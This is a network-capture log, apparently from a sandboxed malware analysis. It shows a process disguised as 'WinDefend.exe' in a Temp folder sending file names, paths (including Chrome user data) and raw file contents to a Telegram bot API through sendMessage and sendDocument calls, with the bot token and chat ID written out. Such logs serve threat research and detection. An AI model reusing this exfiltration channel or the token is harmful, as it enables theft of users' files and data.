2024-05-23 13:35:46 UTC	4096	OUT	Data Raw: 28 5a 8d 65 c5 b6 e9 d5 33 44 2d 79 97 57 da 20 3c d8 02 a9 2b c4 37 63 31 51 4b b2 58 88 a6 39 a4 b1 ea 4e 0b 3b 7a b5 af 12 b6 3d 15 51 4b e5 a3 16 d5 ce 29 94 44 84 1f f7 8b 53 67 64 1f de c7 c4 af 76 1b cc db ec 2d 27 4d f8 ec 22 6a c9 50 d7 2b 16 b5 c8 37 82 c1 0a 36 dd a9 bf 19 95 7b 20 bf ac a3 83 69 cb 7a a2 ee 47 a4 07 0c 6e a2 16 ff 89 89 c3 5c 9d bb 17 a5 46 2d 39 15 e2 e0 2a 9e 91 a9 d1 75 e7 5e 19 de 45 28 e1 3e 3b a6 eb 87 3e 57 7b 79 64 8a f8 6c 53 36 68 ff a0 a1 d5 cf e8 15 bd c5 53 e4 b5 45 d1 3f 58 77 aa ba 27 1c 69 ce d5 92 bc ad b2 b4 4d eb a8 25 ef b6 19 bb aa 7f 78 7f 0a f5 7d 4f 0a 8d 5a 06 67 26 2f 25 b5 ea 42 76 16 59 8a a0 b4 a8 c5 e8 20 ad c0 a8 c5 b4 4c f3 ee 91 4a 8c 5a 0e 0e 6e f5 0f 3e 75 fa 49 ff 60 3e 52 a6 fe d7 54 d6 43 Data Ascii: (Ze3D-yW <+7c1QKX9N;z=QK)DSgdv-'M"jP+76{ izGn\F-9*u^E(>;>W{ydlS6hSE?Xw'iM%x}OZg&/%BvY LJZn>uI`>RTC
2024-05-23 13:35:46 UTC	1328	OUT	Data Raw: 9a 83 c0 65 b6 7e e7 d2 57 86 17 13 25 44 2d fb cf 5b 8a 5e 68 44 d4 02 00 00 00 00 00 a6 3d 6a 01 00 00 00 00 00 70 6a 02 a3 96 cd ed dd 1f bf bc fd e4 f9 2b 8f 3e b7 39 fc 7a e2 bf e2 41 0a 1b 00 00 e8 8f 22 c4 22 fe c1 28 02 00 00 98 8e 25 86 59 44 1e 63 89 a2 a3 96 dd dd dd e7 5f f9 ed c9 b3 97 ae bf ef b5 db be fa c6 3d 4f 5f f2 7e 78 79 e9 07 97 3f f7 d4 25 f1 5f f1 a0 f8 93 58 61 af 7e ed de 4f 56 23 cf 14 ff fd e8 7b f6 3e f2 6e 07 8f 8f be 38 00 00 a8 3c e9 28 42 2c e2 1f e1 51 84 58 8d 6d 05 00 00 52 c7 12 9f 7b ea d2 d2 0f 72 19 4b 14 1a b5 74 2f ef 9c f8 c6 9b 47 97 ba 67 cf 6f 5e ba 22 f9 e8 e2 41 f1 27 b1 c2 97 1f 7c 66 f7 c6 50 20 e2 e7 23 b1 a0 c4 fa 71 00 00 30 56 f4 47 11 62 35 b1 32 5b 0c 00 00 94 35 96 28 2e 6a b9 f8 eb de 27 ce 74 97 Data Ascii: e~W%D-[^hD=jpj+>9zA""(%YDc_=O_~xy?%_Xa~OV#{>n8<(B,QXmR{rKt/Ggo^"A'\|fP #q0VGb52[5(.j't
2024-05-23 13:35:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:46 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:46 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
214	192.168.2.5	61265	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:46 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:35:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:46 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 39 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+192.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:35:47 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:47 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
215	192.168.2.5	61266	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:46 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 230 Expect: 100-continue
2024-05-23 13:35:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:47 UTC	230	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 68 69 5f 63 6f 6e 74 72 61 73 74 25 35 43 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 30 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+core_icons_hiContrast_bow.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Chi_contrast%5Ccore_icons_hiContrast_bow.png%0ASize%3A+10+KB
2024-05-23 13:35:47 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:47 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
216	192.168.2.5	61267	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:47 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:47 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 39 62 31 36 36 32 62 65 65 36 34 36 35 38 66 66 38 64 64 31 38 34 37 33 37 61 30 35 36 35 31 30 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 39 62 31 36 36 32 62 65 65 36 34 36 35 38 66 66 38 64 64 31 38 34 37 33 37 61 30 35 36 35 31 30 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 37 37 2b Data Ascii: chat_id=1655240967&text=File%3A+9b1662bee64658ff8dd184737a056510.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C9b1662bee64658ff8dd184737a056510.png%0ASize%3A+77+
2024-05-23 13:35:47 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:47 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
217	192.168.2.5	61268	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:47 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="b6ac085b-b0e5-487e-b9f7-fafc3df76db9" Host: api.telegram.org Content-Length: 1531 Expect: 100-continue
2024-05-23 13:35:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:48 UTC	40	OUT	Data Raw: 2d 2d 62 36 61 63 30 38 35 62 2d 62 30 65 35 2d 34 38 37 65 2d 62 39 66 37 2d 66 61 66 63 33 64 66 37 36 64 62 39 0d 0a Data Ascii: --b6ac085b-b0e5-487e-b9f7-fafc3df76db9
2024-05-23 13:35:48 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 39 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 39 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=192.png; filename*=utf-8''192.png
2024-05-23 13:35:48 UTC	1213	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 06 00 00 00 52 dc 6c 07 00 00 04 84 49 44 41 54 78 9c ed dd 3f af 14 65 18 c6 e1 67 ce ee 02 85 89 16 16 14 14 14 b6 26 fa 11 88 a0 05 24 14 b6 d4 6a 61 82 85 8d b1 b0 b2 c7 c4 42 ac 2c 6c 4d 34 c1 46 20 e7 2b 58 d8 29 c6 82 c2 c2 42 13 23 7a ce 0e 63 01 28 7f 0f 07 d8 3d ef ec dc d7 f5 09 ee ec ce 2f ef cc 4e b1 55 00 00 00 00 00 c0 54 75 ad 07 ec 65 d8 ae 17 fb 7e 76 7a a8 ee 4c 55 1d eb 6a 38 3a 54 77 bc f5 ae 31 fb eb e7 e5 7b cf bf 55 9f b4 de b1 29 46 19 c0 b0 5d 47 fb e5 ec c3 a1 eb de a9 aa 79 eb 3d 9b e4 c6 b5 65 0d 5d 89 60 9f 46 17 c0 f2 f2 ec f4 d0 75 5f 56 d5 0b ad b7 6c a2 1b d7 96 55 55 22 d8 a7 ad d6 03 ee b6 73 65 71 7e e8 ba af cb c5 ff cc ba a1 2e fc f1 79 9d 6f Data Ascii: PNGIHDRRlIDATx?eg&$jaB,lM4F +X)B#zc(=/NUTue~vzLUj8:Tw1{U)F]Gy=e]`Fu_VlUU"seq~.yo
2024-05-23 13:35:48 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 62 36 61 63 30 38 35 62 2d 62 30 65 35 2d 34 38 37 65 2d 62 39 66 37 2d 66 61 66 63 33 64 66 37 36 64 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --b6ac085b-b0e5-487e-b9f7-fafc3df76db9Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:48 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:48 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 62 36 61 63 30 38 35 62 2d 62 30 65 35 2d 34 38 37 65 2d 62 39 66 37 2d 66 61 66 63 33 64 66 37 36 64 62 39 2d 2d 0d 0a Data Ascii: --b6ac085b-b0e5-487e-b9f7-fafc3df76db9--
2024-05-23 13:35:48 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:48 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
218	192.168.2.5	61269	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:48 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="c4b3654f-6b19-4d85-9f54-8ddd111b40e6" Host: api.telegram.org Content-Length: 10675 Expect: 100-continue
2024-05-23 13:35:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:48 UTC	40	OUT	Data Raw: 2d 2d 63 34 62 33 36 35 34 66 2d 36 62 31 39 2d 34 64 38 35 2d 39 66 35 34 2d 38 64 64 64 31 31 31 62 34 30 65 36 0d 0a Data Ascii: --c4b3654f-6b19-4d85-9f54-8ddd111b40e6
2024-05-23 13:35:48 UTC	137	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=core_icons_hiContrast_bow.png; filename*=utf-8''core_icons_hiContrast_bow.png
2024-05-23 13:35:48 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 2c 08 03 00 00 00 16 ea 90 af 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 01 53 50 4c 54 45 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ee fb ff f0 f6 fb fe f3 f3 f3 f3 f3 dd f6 ff ef ef ef fd e9 e9 e1 ed f8 cc f2 ff ea ea ea e7 e7 e7 fc df df bb ee ff e3 e3 e3 d3 e3 f4 df df df aa ea ff da da da d8 d8 d8 c4 da f1 99 e5 ff ff cc cc 88 e1 ff b5 d1 ed fa c2 c2 cc cc cc 77 dd ff f9 bb bb f9 b6 b6 a5 ca ec a6 c8 e9 66 d9 ff c2 c2 c2 55 d4 ff bc bc bc bb bb bb 97 bf e6 44 d0 ff b5 b5 b5 f7 a4 a4 f7 a0 a0 33 cc ff 89 b5 e2 ae ae ae aa aa aa 22 c8 ff a6 a6 a6 7a ac df 11 c3 ff a1 a1 a1 6a a6 df 6b a3 db 00 Data Ascii: PNGIHDR,sBITOSPLTEwfUD3"zjk
2024-05-23 13:35:48 UTC	4096	OUT	Data Raw: 8f 32 f1 eb c3 88 6b 09 da aa 6c fa 9b ea 76 2b fb 3d 87 5e 9d bb 3e 47 fe ed af d1 e2 6d ef 39 84 1d 8d 2b bc ec e6 28 f5 76 c4 ab cb d7 d2 c4 2b 74 cd 50 cb f1 a4 4a 81 21 a4 0e 2a dd aa d4 12 fc 35 ff bd a9 c4 6e b3 18 81 3a 12 e9 49 3c f5 07 e5 51 7a d7 ba dd 24 a9 1b dd 88 37 b2 94 25 4d b6 0e 73 fb 93 6d 64 d7 e1 6a fb d6 34 da f5 f1 9e 77 8c 78 a1 61 a3 12 26 19 46 bd 9d de 00 ed 56 f0 1e 1f 36 00 9e 63 3d 9e 12 4c a4 76 63 29 45 7d 4d 85 96 93 5d d6 3b 69 c4 6b b3 18 81 39 92 7a 57 54 f1 22 4c f2 ba 20 6c 23 5e cf 12 37 14 5b 37 98 c0 1e 30 6d 94 ff 44 c4 be 22 7d 54 29 ed 56 d3 8a b7 20 b5 aa 6f 60 8f 36 3a bd 91 42 e6 32 23 c5 bc 40 e6 58 8f 47 85 9f a5 f4 39 52 8a f2 5a 4c a0 0f 87 8f a5 09 58 1b f1 da 2c ba 61 43 85 0a 13 d5 91 48 bf 00 b7 65 Data Ascii: 2klv+=^>Gm9+(v+tPJ!*5n:I<Qz$7%Msmdj4wxa&FV6c=Lvc)E}M];ik9zWT"L l#^7[70mD"}T)V o`6:B2#@XG9RZLX,aCHe
2024-05-23 13:35:48 UTC	2121	OUT	Data Raw: bd 90 da 57 b1 6b 00 2a ae 0f df b3 dc 81 94 78 9b aa 9f 39 6a 76 4e 39 5e 71 eb 96 98 c8 f5 d6 d9 86 56 bc f8 6c 43 6c c9 13 d5 5c 99 78 3f 7a 9a 7f 46 53 2f 14 c2 46 ab b7 19 b0 b5 b7 cd 72 78 b4 de 0c d8 9c fd 7a 72 e2 f1 fc 7d cb 6e 7e ab 64 fb 93 27 53 b9 5e 33 5e a9 f4 62 16 ac 4d ef c2 f5 70 53 cb ca f1 de 7a e3 0d a5 de 77 c9 cd b4 52 27 7b 5a f1 96 2f 7d 8a ed ca c4 eb f8 e4 01 5b 40 18 b0 49 3f ad fd 6c 33 0d 69 4d 95 3d 34 7e 76 bf 8e 79 ed a9 32 e5 78 6b fe 19 db 34 0a 51 f7 9c 62 2b 28 8f 10 af 71 bc 46 bc 53 b8 5e 33 69 24 07 d0 f5 8b 97 3e c3 a6 a4 ba 31 3d 8c 10 ef c6 f4 30 46 bc a0 de cf 88 43 36 e9 7b b1 61 6f 68 e2 c2 a8 ce 36 14 b6 49 8a 7b 66 46 6d bf ce 36 9c 58 43 5e e5 78 9f fc f4 a7 ea cf 7f 23 5b 46 a2 e8 8a 17 93 17 05 44 95 b5 Data Ascii: Wk*x9jvN9^qVlCl\x?zFS/Frxzr}n~d'S^3^bMpSzwR'{Z/}[@I?l3iM=4~vy2xk4Qb+(qFS^3i$>1=0FC6{aoh6I{fFm6XC^x#[FD
2024-05-23 13:35:48 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 63 34 62 33 36 35 34 66 2d 36 62 31 39 2d 34 64 38 35 2d 39 66 35 34 2d 38 64 64 64 31 31 31 62 34 30 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --c4b3654f-6b19-4d85-9f54-8ddd111b40e6Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:48 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:48 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 63 34 62 33 36 35 34 66 2d 36 62 31 39 2d 34 64 38 35 2d 39 66 35 34 2d 38 64 64 64 31 31 31 62 34 30 65 36 2d 2d 0d 0a Data Ascii: --c4b3654f-6b19-4d85-9f54-8ddd111b40e6--
2024-05-23 13:35:48 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:48 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
219	192.168.2.5	61270	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:48 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="bf45d7d5-cdaa-4bf3-96de-598d21fd0bcb" Host: api.telegram.org Content-Length: 79559 Expect: 100-continue
2024-05-23 13:35:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:49 UTC	40	OUT	Data Raw: 2d 2d 62 66 34 35 64 37 64 35 2d 63 64 61 61 2d 34 62 66 33 2d 39 36 64 65 2d 35 39 38 64 32 31 66 64 30 62 63 62 0d 0a Data Ascii: --bf45d7d5-cdaa-4bf3-96de-598d21fd0bcb
2024-05-23 13:35:49 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 62 31 36 36 32 62 65 65 36 34 36 35 38 66 66 38 64 64 31 38 34 37 33 37 61 30 35 36 35 31 30 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 62 31 36 36 32 62 65 65 36 34 36 35 38 66 66 38 64 64 31 38 34 37 33 37 61 30 35 36 35 31 30 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=9b1662bee64658ff8dd184737a056510.png; filename*=utf-8''9b1662bee64658ff8dd184737a056510.png
2024-05-23 13:35:49 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 0c 00 00 03 01 08 02 00 00 00 25 36 6e b1 00 00 80 00 49 44 41 54 78 da ec bd 57 70 54 d7 de b7 f9 dd 4c cd dd dc 4d 7d 17 53 53 53 df c5 cc 79 df 13 6c 1f fb 38 67 30 c6 80 31 18 8c b1 c1 c6 36 06 13 8c 89 26 9a 8c 10 98 20 92 44 30 88 8c 10 02 84 84 00 21 24 91 41 20 24 84 50 40 39 a2 84 84 02 ca 01 98 e7 ed ff f1 7e bb 24 10 32 06 13 fc 7b aa 4b d5 da bd e2 7f ed de 6b 3d bd 77 ef fe 1f 3f 8e 19 a3 87 1e 7a e8 a1 87 1e 7a e8 a1 87 1e 7a e8 a1 87 1e 7a f0 f8 1f 0a 81 1e 7a e8 a1 87 1e 7a e8 a1 87 1e 7a e8 a1 87 1e 7a 48 92 f5 d0 43 0f 3d f4 d0 43 0f 3d f4 d0 43 0f 3d f4 d0 e3 2e 92 bc f2 d3 54 e7 b1 a2 5f aa cf c0 b4 f2 c2 fa 9b b7 5a 9a 85 10 42 08 21 84 10 42 88 a7 91 5b b7 6e dd 76 21 49 16 42 Data Ascii: PNGIHDR%6nIDATxWpTLM}SSSyl8g016& D0!$A $P@9~$2{Kk=w?zzzzzzzzHC=C=C=.T_ZB!B[nv!IB
2024-05-23 13:35:49 UTC	4096	OUT	Data Raw: d7 e9 d3 a7 bd bd bd 9d df 81 70 bf ad a3 9d 84 74 ce 36 93 86 89 0f 55 76 2f ca 2a 72 4e 47 3b e3 e2 5c f4 94 91 91 c1 6c c8 bc e3 3e 28 56 3e a3 e9 e5 e5 c5 f4 84 d3 62 e9 8c 2f 29 0f 1f 3e 6c 1f b3 5a f9 56 a6 73 e7 92 56 bd 60 95 e0 7e 13 10 db ce 24 75 ea d4 29 a6 33 a7 e3 d6 97 56 0d 78 24 d0 0c f6 d8 45 8b 16 b1 34 21 98 cb 96 2d 63 81 e2 de 30 e7 16 9b 4e 9b 61 eb d6 ad b1 b1 b1 f4 eb 8e 09 dc f3 f2 a4 ac ac 8c 92 ed e6 20 d5 d5 d5 44 d5 16 4c ce 2e e1 1e 58 27 aa 2c 4b 0e 1d 3a 84 60 bb ff 88 86 fb 19 6f f7 bc ce c6 56 69 dc 9f b4 ba 4e a1 d5 5f ad 10 84 10 4f 9f 24 73 94 de b7 6f 9f f3 c1 7d 3b 8e 6a 3a 36 7f fe fc 61 c3 86 e1 ba 36 3b 04 06 06 a2 cd 07 0e 1c c0 a7 78 89 27 a3 47 8f e6 18 4e ca fc fc 7c 74 9a 19 93 29 cf cf cf 0f c1 c4 b6 90 38 Data Ascii: pt6Uv/*rNG;\l>(V>b/)>lZVsV`~$u)3Vx$E4!-c0Na DL.X',K:`oViN_O$so};j:6a6;x'GN\|t)8
2024-05-23 13:35:49 UTC	4096	OUT	Data Raw: 45 b9 27 76 ca 7c 6a 2e 7e 71 fa 68 df 26 f5 f3 f3 c3 52 10 1e f7 00 b6 c5 f9 19 21 9e e0 4b 84 2e 32 32 12 e3 72 62 d2 6a 08 9c 6b 8b 9c c0 3a 1b 9d 09 ae 6d 60 dd 47 ca 69 e7 1d e7 29 f7 72 dc c7 fd 6e 03 d7 aa b4 56 63 8d d5 af 58 b1 c2 2e 37 38 76 ec 98 7b 34 1e 87 7d be 55 3c dd 5b ee bc 29 da ef a6 13 d2 b6 25 b8 f7 d1 3d 65 ab 37 4e ab 41 74 bf d2 cd be 93 8c e8 da ed 67 da be 1f 2d 0d 46 6d 1f cd 2c 5a b4 08 c7 be e3 58 b8 77 a1 ed 3e 20 84 10 4f 19 1c 1b 73 73 73 ed 3b 3e ce 15 d4 8f 09 76 57 ce 2d 5b b6 64 65 65 b5 3d 0e 3f 32 49 16 42 08 f1 90 14 b1 aa aa 2a 2c 2c 6c cf 9e 3d 8f f6 9e 4c 8f c9 87 0e 76 6a bd e3 71 b0 d3 b6 e1 e1 e1 e5 e5 e5 4f d3 5e 91 92 92 c2 2e 71 fc f8 71 9d b7 bc 8f e8 b1 33 10 c0 9a 9a 9a 76 d2 d4 d5 d5 9d 3e 7d 1a 49 4e Data Ascii: E'v\|j.~qh&R!K.22rbjk:m`Gi)rnVcX.78v{4}U<[)%=e7NAtg-Fm,ZXw> Osss;>vW-[dee=?2IB*,,l=LvjqO^.qq3v>}IN
